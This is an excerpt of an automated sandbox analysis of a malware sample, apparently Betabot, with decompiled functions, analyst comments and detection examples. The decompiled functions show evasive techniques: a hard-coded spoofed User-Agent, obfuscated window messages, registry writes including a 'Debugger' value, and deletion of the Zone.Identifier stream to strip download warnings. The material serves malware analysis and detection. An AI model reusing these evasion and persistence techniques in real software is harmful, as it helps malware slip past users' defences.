                        					// dwAccessType for InternetOpenA: 0 = INTERNET_OPEN_TYPE_PRECONFIG (use the system proxy settings),
                        					// 1 = INTERNET_OPEN_TYPE_DIRECT; any other stored value is normalized to PRECONFIG.
                        					_t20 =  *0x28a0618;
                        					if(_t20 != 1 && _t20 != 0) {
                        						_t20 = 0;
                        					}
                        					_t22 = InternetOpenA( &_v264, _t20, 0, 0, 0); // executed
                        					if(_t22 != 0) {
                        						 *(_t36 + 0x124) = _t22; // hInternet stored in the context structure
                        						if( *((intOrPtr*)(_t36 + 0xc)) == 0) {
                        							// Self-check over the structure (+0x8a) through an unresolved import; on mismatch the
                        							// stored handle is XORed with 0xe0a6, corrupting the handle value instead of signalling an error.
                        							_push(_t36 + 0x8a);
                        							if(( *0x289f6b8() ^  *((intOrPtr*)(_t36 + 0x10)) + 0x0000a5f0) !=  *((intOrPtr*)(_t36 + 0x7a))) {
                        								 *(_t36 + 0x124) =  *(_t36 + 0x124) ^ 0x0000e0a6;
                        							}
                        						}
                        						_t23 =  *(_t36 + 0x124);
                        					} else {
                        						_t23 = 0;
                        					}
                        					return _t23;
                        				} else {
                        					return 0;
                        				}
                        			}
                        Instruction addresses (the report's per-statement address column; its alignment to the code lines above was lost in extraction): 0x0287a8e1 .. 0x0287a99d

                        APIs
                        • InternetOpenA.WININET(?,?,00000000,00000000,00000000,?,?,00000000,00000104,000000C0), ref: 0287A955
                        Strings
                        • Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; .NET CLR 2.0.50726), xrefs: 0287A928
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: InternetOpen
                        • String ID: Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; .NET CLR 2.0.50726)
                        • API String ID: 2038078732-1656825793
                        • Opcode ID: 080ce42c03be07a491709a71cdbc2d79dc660f80f393c96d172c6f32a6bb3921
                        • Instruction ID: a8d06d1c530120a24acba0c011b16f818ade8138bd43e9dad83d77f5385b2e9b
                        • Opcode Fuzzy Hash: 080ce42c03be07a491709a71cdbc2d79dc660f80f393c96d172c6f32a6bb3921
                        • Instruction Fuzzy Hash: 1611CEBD600704ABDB35CA38C988FDB73FCAB94705F040829E29AD3580E774E590CA10
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • CreateWindowExA.USER32(00000000,tooltips_class32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0288E942,?,?), ref: 0288E827
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateWindow
                        • String ID: tooltips_class32
                        • API String ID: 716092398-1918224756
                        • Opcode ID: f1b215ef09dd678268638e5b3ade3550bf4c894b5f2f53d0ce924dbeb9979a74
                        • Instruction ID: 7a63f63f99d1e6e9f30a3b25449cb586a0487cd8b6e1fadbf1c98711e8f7e98b
                        • Opcode Fuzzy Hash: f1b215ef09dd678268638e5b3ade3550bf4c894b5f2f53d0ce924dbeb9979a74
                        • Instruction Fuzzy Hash: 880186BFB5512037E2243626AC0EEAF1E6FDFD2B7171CC918F219E16D1CE58402285B1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E0288449D(void* __ecx, signed int __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, signed int _a16) {
                        				signed int _v20;
                        				int _v24;
                        				int _v28;
                        				char _v32;
                        				signed int _t17;
                        				signed int _t21;
                        				int _t22;
                        				int _t26;
                        				int _t29;
                        
                        				if(_a4 == 0 || _a8 == 0 || _a12 == 0) {
                        					return _t17 | 0xffffffff;
                        				} else {
                        					E028614DB(__ecx,  &_v32, 0, 0x1c);
                        					_t21 =  *0x28a4100;
                        					_t26 = _a12;
                        					_t29 = _a16;
                        					_v28 = _t26;
                        					_v24 = _t29;
                        					_v20 = __edi;
                        					// With a non-zero key (*0x28a4100) the window message and both parameters are obfuscated
                        					// before posting: msg += key & 0x1f, wParam ^= key ^ 0x002a73e4, lParam (passed in EDI) ^= key ^ 0x002a73e4.
                        					// The receiving window procedure needs the same key to invert this; with key == 0 the values are posted as given.
                        					if(_t21 != 0) {
                        						_t26 = (_t21 & 0x0000001f) + _a12;
                        						_t29 = _t21 ^ _a16 ^ 0x002a73e4;
                        						_v28 = _t26;
                        						_v24 = _t29;
                        						_v20 = _t21 ^ __edi ^ 0x002a73e4;
                        					}
                        					_t22 = PostMessageA(_a4, _t26, _t29, _v20); // executed
                        					return _t22;
                        				}
                        			}
                        Instruction addresses (the report's per-statement address column; its alignment to the code lines above was lost in extraction): 0x028844a9 .. 0x02884502

                        APIs
                        • PostMessageA.USER32(?,00000000,028845A8,00000000,?,00000000,0000001C,00000000,?,?,028845A8,00000000,0286E0E2,?,CCCCCCB2), ref: 02884502
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: MessagePost
                        • String ID: s*
                        • API String ID: 410705778-999847807
                        • Opcode ID: aad07a58703a43fb90c985610c2764ff9789c47886d556ed94869be6d1cf1a7a
                        • Instruction ID: 100c79e622756a0f636f7729595e9825054aba001ea355c16a6c2431ce8745cf
                        • Opcode Fuzzy Hash: aad07a58703a43fb90c985610c2764ff9789c47886d556ed94869be6d1cf1a7a
                        • Instruction Fuzzy Hash: 01014CBAD0122EDBCF04DF54DC408AFBBB5BB94700B04852AF816E2245D7708A51CBE0
                        Uniqueness

                        Uniqueness Score: -1.00%
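The parameter transform E0288449D applies before PostMessageA, its inverse, and what an observer without the key can still recover, as an added example that is not code from the report or from the sample. The key and parameter values below are constructed; in the sample the key is the global at 0x28a4100 and would have to be read out of the process (for instance from a hook on PostMessageA) before deobfuscate_message can be applied.

```python
# Added example, not code from the report or the sample: the transform
# E0288449D applies to (msg, wParam, lParam) when the global key is non-zero,
# its inverse, and the key-less partial recovery of the message ID.
MASK32 = 0xFFFFFFFF
XOR_CONST = 0x002A73E4          # constant visible in the decompiled function


def obfuscate_message(key, msg, wparam, lparam):
    """key == 0 is the pass-through path of the decompiled function."""
    if key == 0:
        return msg & MASK32, wparam & MASK32, lparam & MASK32
    return ((msg + (key & 0x1F)) & MASK32,          # message ID shifted by 0..31
            (key ^ wparam ^ XOR_CONST) & MASK32,
            (key ^ lparam ^ XOR_CONST) & MASK32)


def deobfuscate_message(key, msg, wparam, lparam):
    """Inverse for a receiver, or an analyst hooking PostMessageA, who knows the key."""
    if key == 0:
        return msg & MASK32, wparam & MASK32, lparam & MASK32
    return ((msg - (key & 0x1F)) & MASK32,
            (key ^ wparam ^ XOR_CONST) & MASK32,
            (key ^ lparam ^ XOR_CONST) & MASK32)


def candidate_base_messages(observed_msg):
    """Without the key the message ID is known only up to the 5-bit offset:
    observed - d for d in 0..31 are the possible original IDs, enough to tell
    whether the traffic sits in the WM_USER / WM_APP ranges."""
    return [(observed_msg - d) & MASK32 for d in range(32)]


if __name__ == "__main__":
    key = 0x5EEDF00D                                  # constructed key value
    sent = obfuscate_message(key, 0x0400, 0x1234, 0xDEADBEEF)
    print([hex(v) for v in sent])
    print([hex(v) for v in deobfuscate_message(key, *sent)])
```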

                        C-Code - Quality: 58%
                        			E0286295B(void* __ecx, void* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                        				void* _v8;
                        				void* _t12;
                        				long _t15;
                        
                        				_push(__ecx);
                        				_v8 = 0;
                        				if(_a8 == 0 || E028619D6(_a8) == 0) {
                        					L4:
                        					_t12 = 0;
                        				} else {
                        					// samDesired 0x102 = KEY_SET_VALUE | KEY_WOW64_64KEY: the key is created in the 64-bit registry
                        					// view even from this 32-bit process. The xref arguments in the API listing below show
                        					// hKey = 0x80000002 (HKEY_LOCAL_MACHINE), subkey "Software\Win7zip" and value name "Uuid".
                        					_t15 = RegCreateKeyExA(_a4, _a8, 0, 0, 0, 0x102, 0,  &_v8, 0); // executed
                        					if(_t15 != 0) {
                        						goto L4;
                        					} else {
                        						// If this wrapper forwards to RegSetValueExA, type 3 = REG_BINARY with _a16/_a20 as data and length.
                        						L0288776E(_v8, _a12, 0, 3, _a16, _a20); // executed
                        						 *0x289fb1c(_v8); // unresolved import called on the key handle, i.e. the close of the key
                        						_t12 = 1;
                        					}
                        				}
                        				return _t12;
                        			}
                        Instruction addresses (the report's per-statement address column; its alignment to the code lines above was lost in extraction): 0x0286295e .. 0x028629b9

                        APIs
                        • RegCreateKeyExA.KERNEL32(?,?,00000000,00000000,00000000,00000102,00000000,00000010,00000000,Software\Win7zip,?,?,028707CC,80000002,Software\Win7zip,Uuid), ref: 0286298A
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: Create
                        • String ID: Software\Win7zip
                        • API String ID: 2289755597-229439935
                        • Opcode ID: 48d9bf02f3f4b394c42542b919c04bd528392af6a66a99458f68e0a3b0d3d78c
                        • Instruction ID: 079c1d634292f44d45bdf1c52162af706c9d024cc33ff497cde3363768e9a658
                        • Opcode Fuzzy Hash: 48d9bf02f3f4b394c42542b919c04bd528392af6a66a99458f68e0a3b0d3d78c
                        • Instruction Fuzzy Hash: 96F0493A501128BBCF11AF92DD09EEF7F6EEF46756B108051FD09E5164D7718A20EBA0
                        Uniqueness

                        Uniqueness Score: -1.00%
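Two detection checks derived from strings visible in E0287A8E1 (the hard-coded User-Agent passed to InternetOpenA) and E0286295B (the HKLM\Software\Win7zip key created with RegCreateKeyExA), as an added example that is not part of the report. The log formats (a key=value proxy line with a quoted ua field; Sysmon registry events 12/13 rendered as key=value) and every log line, IP, host and image path are constructed. The User-Agent is a string a genuine IE7 client on Windows Server 2003 x64 would also send and the key name is unremarkable, so treat a hit as a lead to pivot on process, destination and the 64-bit-view write rather than as a verdict.

```python
# Added example, not part of the Joe Sandbox report: matches two indicators
# taken from the decompiled functions against constructed log lines.
import re

# User-Agent string hard-coded in E0287A8E1 (fallback passed to InternetOpenA).
BETABOT_UA = ("Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; "
              ".NET CLR 2.0.50726)")
# Registry key created via E0286295B (HKLM\Software\Win7zip, value "Uuid").
WIN7ZIP_KEY_RE = re.compile(r"\\Software\\Win7zip(\\|$)", re.IGNORECASE)

KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_kv(line):
    """Split a constructed key=value log line; quoted values may contain spaces."""
    return {k: v.strip('"') for k, v in KV_RE.findall(line)}


def scan_proxy(lines):
    """Return proxy records whose ua field equals the hard-coded string exactly.
    Assumed line format: ts=... src=... host=... ua="..." (constructed)."""
    hits = []
    for line in lines:
        rec = parse_kv(line)
        if rec.get("ua") == BETABOT_UA:
            hits.append(rec)
    return hits


def scan_registry(lines):
    """Return Sysmon-style registry events (EventID 12 key create/delete,
    13 value set) whose TargetObject is the Win7zip key or a value under it."""
    hits = []
    for line in lines:
        rec = parse_kv(line)
        if (rec.get("EventID") in ("12", "13")
                and WIN7ZIP_KEY_RE.search(rec.get("TargetObject", ""))):
            hits.append(rec)
    return hits


# Constructed sample lines; hosts, IPs and image paths are placeholders.
PROXY_LOG = [
    'ts=1700000000 src=10.0.0.5 method=GET host=example.invalid status=200 '
    'ua="Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/118.0"',
    'ts=1700000001 src=10.0.0.7 method=POST host=198.51.100.23 status=200 '
    'ua="Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; .NET CLR 2.0.50726)"',
]
REGISTRY_LOG = [
    r'EventID=13 Image=C:\Windows\System32\svchost.exe '
    r'TargetObject=HKLM\SYSTEM\CurrentControlSet\Services\W32Time\Start Details="DWORD (0x00000002)"',
    r'EventID=12 Image=C:\ProgramData\sample.exe EventType=CreateKey '
    r'TargetObject=HKLM\SOFTWARE\Win7zip',
    r'EventID=13 Image=C:\ProgramData\sample.exe EventType=SetValue '
    r'TargetObject=HKLM\SOFTWARE\Win7zip\Uuid Details="Binary Data"',
]

if __name__ == "__main__":
    for rec in scan_proxy(PROXY_LOG):
        print("proxy hit:", rec["src"], "->", rec["host"])
    for rec in scan_registry(REGISTRY_LOG):
        print("registry hit:", rec["Image"], rec["TargetObject"])
```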

                        C-Code - Quality: 33%
                        			E028855FF(void* __ecx) {
                        				char _v8;
                        				void* _t3;
                        				void* _t9;
                        				intOrPtr _t12;
                        
                        				_t12 = 0;
                        				// E02865E00 takes a function pointer (E028855D5) and an out-pointer and its result is used as a
                        				// handle below, which suggests a thread/object creation wrapper; the wrapper itself is not shown here.
                        				_t3 = E02865E00(E028855D5, 0, 0, 0xc, 0,  &_v8, 0x18); // executed
                        				_t9 = _t3;
                        				if(_t9 != 0) {
                        					// Unresolved import called as f(handle, 0xbb8): 0xbb8 = 3000, consistent with a 3 s wait
                        					// whose return value 0 (WAIT_OBJECT_0) is the success condition.
                        					_push(0xbb8);
                        					_push(_t9);
                        					if( *0x289f8a4() == 0) {
                        						_t12 = 1;
                        					}
                        					// FindCloseChangeNotification shares its kernel32 entry point with CloseHandle, so static
                        					// resolvers commonly print this name for what is most likely a plain CloseHandle(_t9).
                        					FindCloseChangeNotification(_t9); // executed
                        				}
                        				return _t12;
                        			}
                        Instruction addresses (the report's per-statement address column; its alignment to the code lines above was lost in extraction): 0x0288560b .. 0x0288563f

                        APIs
                        • FindCloseChangeNotification.KERNEL32(00000000,?,?,02870858,LCT), ref: 02885634
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: ChangeCloseFindNotification
                        • String ID: LCT
                        • API String ID: 2591292051-831726749
                        • Opcode ID: 45ecbd5f888eb54a383d099c2f299d6aec004b531e456bf39eaa2686093eb01b
                        • Instruction ID: fd8650e2717d6ddcd5201835ce64ba3adb9c03856a6563feb7202503cdd5b446
                        • Opcode Fuzzy Hash: 45ecbd5f888eb54a383d099c2f299d6aec004b531e456bf39eaa2686093eb01b
                        • Instruction Fuzzy Hash: E8E0DF3A34122077E530A65A8C0DEEB7F9DCB92EE5FA50018F60AE2081DB949401C1F1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 68%
                        			E0288DE6C(intOrPtr _a4) {
                        				short _v524;
                        				signed int _t16;
                        
                        				if(_a4 == 0) {
                        					L3:
                        					return 0;
                        				}
                        				_t18 = _a4;
                        				if(E028619E8(_a4) == 0) {
                        					goto L3;
                        				}
                        				E028614DB(_t18,  &_v524, 0, 0x208);
                        				// Builds "<path>:Zone.Identifier", the NTFS alternate data stream that carries the Mark-of-the-Web
                        				// (ZoneId=3 for files downloaded from the Internet), and deletes it so the file no longer
                        				// triggers download warnings or SmartScreen checks.
                        				 *0x289fa88( &_v524, L"%s:Zone.Identifier", _a4);
                        				_t16 = DeleteFileW( &_v524); // executed
                        				return _t16 & 0xffffff00 | _t16 != 0x00000000; // BOOL success in AL
                        			}
                        Instruction addresses (the report's per-statement address column; its alignment to the code lines above was lost in extraction): 0x0288de79 .. 0x0288dec6

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: DeleteFile
                        • String ID: %s:Zone.Identifier
                        • API String ID: 4033686569-2483707826
                        • Opcode ID: 81ba72726a1571abf114b51b35261a14a2ce4d170e66fb9ce3c0fa5628d3ad1f
                        • Instruction ID: 7d042619b1bb490e58c8e870b63259b9775098afe1f948a9e3f451ca43fb78d4
                        • Opcode Fuzzy Hash: 81ba72726a1571abf114b51b35261a14a2ce4d170e66fb9ce3c0fa5628d3ad1f
                        • Instruction Fuzzy Hash: 06F08C3D940308A7DF50AE74DC4EFDB37AC5F20349F0445A0AA59D60E2EF78D6A5CA91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 64%
                        			E028800ED(void* __ecx, signed int _a4) {
                        				signed int _v8;
                        				char _v12;
                        				signed int _v16;
                        				signed int _v20;
                        				signed int _v24;
                        				signed int _v28;
                        				char _v548;
                        				void* __ebx;
                        				signed int _t48;
                        				signed int _t50;
                        				signed int _t51;
                        				void* _t54;
                        				void* _t58;
                        				signed int _t61;
                        				signed int _t63;
                        				signed int _t66;
                        				signed int _t70;
                        				void* _t72;
                        				signed int _t73;
                        				signed int _t81;
                        				signed int _t84;
                        				void* _t85;
                        				intOrPtr _t86;
                        				signed int _t88;
                        				signed int _t93;
                        
                        				_t84 = 0;
                        				if(_a4 == 0) {
                        					return 0;
                        				}
                        				_v16 = 0;
                        				_a4 = 0;
                        				_v12 = 0;
                        				_t73 = 0;
                        				_v20 = 0;
                        				_v24 = 0;
                        				E028614DB(__ecx,  &_v548, 0, 0x208);
                        				 *0x289f730( &_v548, 0x103, _t85, _t72);
                        				_t48 = E028619E8( &_v548);
                        				_t86 =  *0x289f2e8;
                        				__eflags = _t48;
                        				if(_t48 == 0) {
                        					L5:
                        					_t81 = 1;
                        					__eflags = 1;
                        					goto L6;
                        				} else {
                        					_t83 = _t86 + 0x13be;
                        					_t70 = E02861E0B(_t86 + 0x13be,  &_v548);
                        					__eflags = _t70;
                        					if(_t70 < 0) {
                        						goto L5;
                        					} else {
                        						_t81 = 1;
                        						_t73 = 1;
                        						L6:
                        						_t50 = E0286D774( *(_t86 + 4) & 0x0000ffff);
                        						__eflags = _t50 - 1;
                        						if(_t50 == 1) {
                        							_v24 = _t81;
                        							_v20 = _t81;
                        						}
                        						__eflags = _t50;
                        						if(_t50 == 0) {
                        							__eflags = _t73;
                        							if(_t73 == 0) {
                        								_v28 = 0;
                        								_v8 = 0;
                        								_t66 =  *0x289f618(0xffffffff, 0x1d,  &_v8, 4,  &_v28);
                        								__eflags = _t66;
                        								if(_t66 >= 0) {
                        									__eflags = _v28;
                        									if(_v28 != 0) {
                        										__eflags = _v8;
                        										if(_v8 != 0) {
                        											_v8 = 0;
                        											 *0x289f614(0xffffffff, 0x1d,  &_v8, 4);
                        										}
                        									}
                        								}
                        							}
                        						}
                        						__eflags =  *0x289f2f4 & 0x00000020;
                        						if(( *0x289f2f4 & 0x00000020) != 0) {
                        							_a4 = 2;
                        						}
                        						while(1) {
                        							_t51 =  *0x289f8a4( *0x289fdb0, 0x12c);
                        							__eflags = _t51;
                        							if(_t51 == 0) {
                        								break;
                        							}
                        							__eflags = _v20 - 1;
                        							if(_v20 != 1) {
                        								_a4 = 1;
                        							} else {
                        								__eflags = _a4;
                        								if(_a4 == 0) {
                        									_t61 =  *0x289fdc8;
                        									asm("sbb esi, esi");
                        									_t93 = ( ~(_t61 & 0x00000200) & 0xfffffffe) + 5;
                        									__eflags = _t61;
                        									if(_t61 < 0) {
                        										_t93 = 0xc; // executed
                        									}
                        									E028802BF(_t81, _t83); // executed
                        									_a4 = _t93;
                        								}
                        							}
                        							__eflags =  *0x28a071c & 0x00000001;
                        							if(( *0x28a071c & 0x00000001) == 0) {
                        								L37:
                        								Sleep(0x7d0); // executed
                        								_t84 = _t84 - 1;
                        								_v16 = _v16 - 1;
                        								_t42 =  &_a4;
                        								 *_t42 = _a4 - 1;
                        								__eflags =  *_t42;
                        								continue;
                        							} else {
                        								__eflags = _v24 - 1;
                        								if(_v24 != 1) {
                        									L32:
                        									__eflags = _v16;
                        									if(_v16 == 0) {
                        										E02888DDE(_t81);
                        										_v16 = 2;
                        									}
                        									_t54 = E0286D774( *( *0x289f2e8 + 4) & 0x0000ffff);
                        									__eflags = _t54 - 1;
                        									if(_t54 == 1) {
                        										__eflags = E02878E4C();
                        										if(__eflags >= 0) {
                        											E02878E8F(_t81, __eflags);
                        										}
                        									}
                        									goto L37;
                        								}
                        								__eflags = _t84;
                        								if(_t84 != 0) {
                        									goto L32;
                        								}
                        								__eflags = _v12 - 0x40;
                        								if(_v12 < 0x40) {
                        									_t88 = 0;
                        									__eflags = 0;
                        									do {
                        										__eflags = _t88;
                        										if(_t88 != 0) {
                        											_t58 = E0288956C(_t88, _t81);
                        											__eflags = _t58 - 1;
                        											if(_t58 == 1) {
                        												_t34 =  &_v12;
                        												 *_t34 = _v12 + 1;
                        												__eflags =  *_t34;
                        											}
                        										}
                        										_t88 = _t88 + 1;
                        										__eflags = _t88 - 0x50;
                        									} while (_t88 < 0x50);
                        									__eflags = 1 - _v12;
                        									asm("sbb edi, edi");
                        									_t84 = _t84 + 5;
                        									__eflags = _t84;
                        								}
                        								goto L32;
                        							}
                        						}
                        						_t63 = _t51 + 1;
                        						__eflags = _t63;
                        						return _t63;
                        					}
                        				}
                        			}

                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
• Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: @
                        • API String ID: 0-2766056989
                        • Opcode ID: 16941b7196ad20ddcd247e101584d4ce0da89f4e9a38de986f6427a40050f2ca
                        • Instruction ID: 0fbc313512fa00b4feb0604727c7f90ecbf4eef934d70e6b7a833b013733afc1
                        • Opcode Fuzzy Hash: 16941b7196ad20ddcd247e101584d4ce0da89f4e9a38de986f6427a40050f2ca
                        • Instruction Fuzzy Hash: D651F77DD40218AADF22BFD8D844BFE77B4AF05714F14412AEA59E7181C7B09688CF86
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 82%
                        			E0286D39F() {
                        				signed int _v8;
                        				signed int _v12;
                        				short* _v16;
                        				signed int _v20;
                        				void* __ebx;
                        				short _t50;
                        				signed int _t65;
                        
                        				_v16 = E0286161B(0x38);
                        				_v12 = _v12 & 0x00000000;
                        				_v8 = _v8 & 0x00000000;
                        				_v20 = _v20 & 0x00000000;
                        				if(_v16 != 0) {
                        					_v20 = E028610C7;
                        					_t50 = 0x38;
                        					 *_v16 = _t50;
                        					 *((intOrPtr*)(_v16 + 0xc)) =  *0x289f2e8;
                        					 *((intOrPtr*)(_v16 + 8)) =  *((intOrPtr*)( *0x289f2e8 + 0x156));
                        					 *((intOrPtr*)(_v16 + 4)) = 0x289098c;
                        					 *((intOrPtr*)(_v16 + 0x10)) =  *0x289f908();
                        					 *((intOrPtr*)(_v16 + 0x14)) =  *((intOrPtr*)( *0x289f2e8 + 0x1e));
                        					 *((intOrPtr*)(_v16 + 0x18)) = E02874941;
                        					 *((intOrPtr*)(_v16 + 0x20)) = E0286161B;
                        					 *((intOrPtr*)(_v16 + 0x24)) = E028617E4;
                        					 *((intOrPtr*)(_v16 + 0x28)) = E028624EB;
                        					 *((intOrPtr*)(_v16 + 0x1c)) = E02874B7A;
                        					 *((intOrPtr*)(_v16 + 0x2c)) = E02874997;
                        					 *((intOrPtr*)(_v16 + 0x30)) = 0x289f530;
                        					_t82 = _v20;
                        					 *(_v16 + 0x34) = _v20;
                        					_v8 = E02874831();
                        					if(_v8 != 0) {
                        						_t65 = E02865D65(_v8, _t82, _v16); // executed
                        						_v12 = _t65;
                        						if(_v12 == 0) {
                        							E028617E4(_v16);
                        							return 0;
                        						}
                        						SleepEx(0x3c, 0); // executed
                        						FindCloseChangeNotification(_v12); // executed
                        						return 1;
                        					}
                        					return 0;
                        				}
                        				return 0;
                        			}

                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
• Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 98e1c01d1a1289f259da731c4ad1a45e1b89c785e3293df1431a42ec3d1411bf
                        • Instruction ID: 0a5d38431e8790b3789a8c1ced6e55c4b578e03a889aa8edb6a8edfa203f190f
                        • Opcode Fuzzy Hash: 98e1c01d1a1289f259da731c4ad1a45e1b89c785e3293df1431a42ec3d1411bf
                        • Instruction Fuzzy Hash: 6531A57CE00208EFCB04DF94D588AADBBB1FB18315F14849AD915EB792C775AA45CF44
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 91%
                        			E02862722(void* __ecx, void* _a4, short* _a8, intOrPtr _a12, intOrPtr _a16) {
                        				void* _v8;
                        				int _t15;
                        				long _t18;
                        				void* _t21;
                        				int _t24;
                        
                        				_push(__ecx);
                        				_t24 = 0;
                        				_v8 = 0;
                        				if(_a16 == 0 || _a8 == 0 || E028619E8(_a8) == 0) {
                        					L7:
                        					_t15 = 0;
                        				} else {
                        					_t18 = RegCreateKeyExW(_a4, _a8, 0, 0, 0, 0x102, 0,  &_v8, 0); // executed
                        					if(_t18 != 0) {
                        						goto L7;
                        					} else {
                        						_t21 = L02887821(_v8, _a12, 0, 1, _a16, E028619E8(_a16) + _t19 + 2); // executed
                        						if(_t21 == 0) {
                        							_t24 = 1;
                        						}
                        						RegCloseKey(_v8); // executed
                        						_t15 = _t24;
                        					}
                        				}
                        				return _t15;
                        			}

                        APIs
                        • RegCreateKeyExW.KERNEL32(?,?,00000000,00000000,00000000,00000102,00000000,?,00000000,00000002,?,?,0287204E,80000002,?,Debugger), ref: 02862756
                        • RegCloseKey.KERNEL32(?,?,?,0287204E,80000002,?,Debugger,?), ref: 02862787
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
• Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseCreate
                        • String ID:
                        • API String ID: 2932200918-0
                        • Opcode ID: bf98b1266b179bf9c76af25e6d5ca6518c362f823e37d0ddd3857b80ed8ad721
                        • Instruction ID: adcb4d1af6d201f92462cccaf1dfff377dd87b0d5595f89b97f50c2bee93b513
                        • Opcode Fuzzy Hash: bf98b1266b179bf9c76af25e6d5ca6518c362f823e37d0ddd3857b80ed8ad721
                        • Instruction Fuzzy Hash: 9501167DA00209BFDF149F90DD8ADBA77AEAB00349B148469BD09D6151D7718E20EB21
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 29%
                        			E02862802(int __eax, intOrPtr _a4, intOrPtr _a8, char* _a12, char* _a16) {
                        				int* _v8;
                        				int _v12;
                        				int _v16;
                        
                        				_v8 = 0;
                        				_v16 = 1;
                        				_v12 = __eax;
                        				if(_a8 == 0 || E028619D6(_a8) == 0 || _a16 == 0) {
                        					L5:
                        					return 0;
                        				} else {
                        					_push( &_v8);
                        					_push(0x101);
                        					_push(0);
                        					_push(_a8);
                        					_push(_a4);
                        					if( *0x289fae0() != 0) {
                        						goto L5;
                        					}
                        					RegQueryValueExA(_v8, _a12, 0,  &_v16, _a16,  &_v12); // executed
                        					RegCloseKey(_v8); // executed
                        					return _v12;
                        				}
                        			}


